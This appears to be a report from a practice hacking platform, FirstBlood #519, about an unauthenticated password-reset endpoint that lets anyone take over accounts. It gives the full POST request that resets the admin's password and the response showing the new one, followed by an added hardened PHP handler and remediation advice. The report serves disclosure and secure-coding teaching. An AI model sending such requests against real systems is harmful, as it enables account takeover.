FirstBlood-#519 — Account takeover via /drpanel/drapi/editpassword.php
This issue was discovered on FirstBlood v2
On 2021-10-26, 0x1452 Level 3 reported:
Hey!
Summary
The HTML source of /drpanel/index.php
contains the following code in a comment:
// Quoted from the HTML comment as found; the request URL and the POST body are empty in the source.
function editpassword(username) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", '', true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.onreadystatechange = function() {
        if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
            alert(this.responseText);
        } else {
        }
    }
    xhr.send();
}
I found that there's an endpoint called /drpanel/drapi/editpassword.php
that lets you reset anyone's password. The user doesn't have to be logged in at all to do this.
To reproduce this simply send a POST request to /drpanel/drapi/editpassword.php
with the body username=:username.
Taking over the admin account:
Note that there are no session cookies set!
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com/login.php?action=login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

username=drAdmin
Example response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - RxJPi2qpNyjYQnc
The attacker can now log into the admin account drAdmin using the new password.
Impact
An attacker can take over any account they know the username of.
P1 CRITICAL
Endpoint: /drpanel/drapi/editpassword.php
This report contains multiple vulnerabilities:
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (dradmin) from /drapi/editpassword because the endpoint only checks the username. Usernames can be enumerated at login, as trying 'drAdmin' produces a different error. The username can also be found from FirstBlood v1.
FirstBlood ID: 28
Vulnerability Type: Auth issues
The endpoint /drapi/editpassword can actually be accessed unauthenticated.
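The two findings above have one root cause: the handler takes a client-supplied username, requires no session, and echoes the new password back. The following is an added illustration written for this page, not FirstBlood's code, of what a hardened editpassword.php-style handler looks like. The table and column names (users, id, username, password_hash), the SQLite PDO connection, the session fields (user_id, csrf_token) and the form field names (csrf_token, current_password, new_password) are all assumptions.

```php
<?php
// Added example, not the FirstBlood project's code. Schema, session keys and
// form field names below are assumptions made for illustration.
declare(strict_types=1);

session_start();

// Vulnerable shape, as described in the report (shown only for contrast):
//   $username = $_POST['username'];                       // attacker picks the target
//   $new = bin2hex(random_bytes(8));
//   $db->prepare('UPDATE users SET password = ? WHERE username = ?')
//      ->execute([$new, $username]);                      // no session, no ownership check
//   echo "Password updated - $new";                       // secret echoed to the caller

function deny(int $status, string $msg): void
{
    http_response_code($status);
    header('Content-Type: text/plain; charset=UTF-8');
    echo $msg;
    exit;
}

// 1. Only POST may change state.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    deny(405, 'Method not allowed');
}

// 2. Authentication (FirstBlood ID 28): an anonymous caller gets nothing.
if (empty($_SESSION['user_id'])) {
    deny(401, 'Authentication required');
}

// 3. CSRF: once the endpoint honours the session cookie, a cross-site form post
//    would carry it too, so a per-session token is compared in constant time.
$token = $_POST['csrf_token'] ?? '';
if (!is_string($token) || !isset($_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $token)) {
    deny(403, 'Invalid CSRF token');
}

// 4. Authorisation (FirstBlood ID 27): the account that changes is the one bound
//    to the session, looked up by id. The client never names the target.
$pdo = new PDO('sqlite:' . __DIR__ . '/app.db');  // assumed connection
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE id = ?');
$stmt->execute([$_SESSION['user_id']]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
if ($user === false) {
    deny(401, 'Authentication required');
}

// 5. Re-authenticate with the current password before accepting a new one.
//    is_string() guards against username[]=... style array smuggling in $_POST.
$current = $_POST['current_password'] ?? '';
$new     = $_POST['new_password'] ?? '';
if (!is_string($current) || !is_string($new)
    || !password_verify($current, $user['password_hash'])) {
    deny(403, 'Current password is incorrect');
}
if (strlen($new) < 12) {
    deny(400, 'New password must be at least 12 characters');
}

// 6. Store a hash, rotate the session id, and never echo the secret back.
$upd = $pdo->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
$upd->execute([password_hash($new, PASSWORD_DEFAULT), $user['id']]);
session_regenerate_id(true);

header('Content-Type: text/plain; charset=UTF-8');
echo 'Password updated';
```

If the application must keep an admin-driven "reset another user's password" feature, the target should still be chosen only after a server-side role check on the session user, the generated credential should be delivered out of band rather than in the HTTP response, and the action should be logged with the acting admin's id. Note also that the login enumeration mentioned under FirstBlood ID 27 is what makes the username the only secret an attacker needs, so the login handler should return the same error for an unknown user and a wrong password.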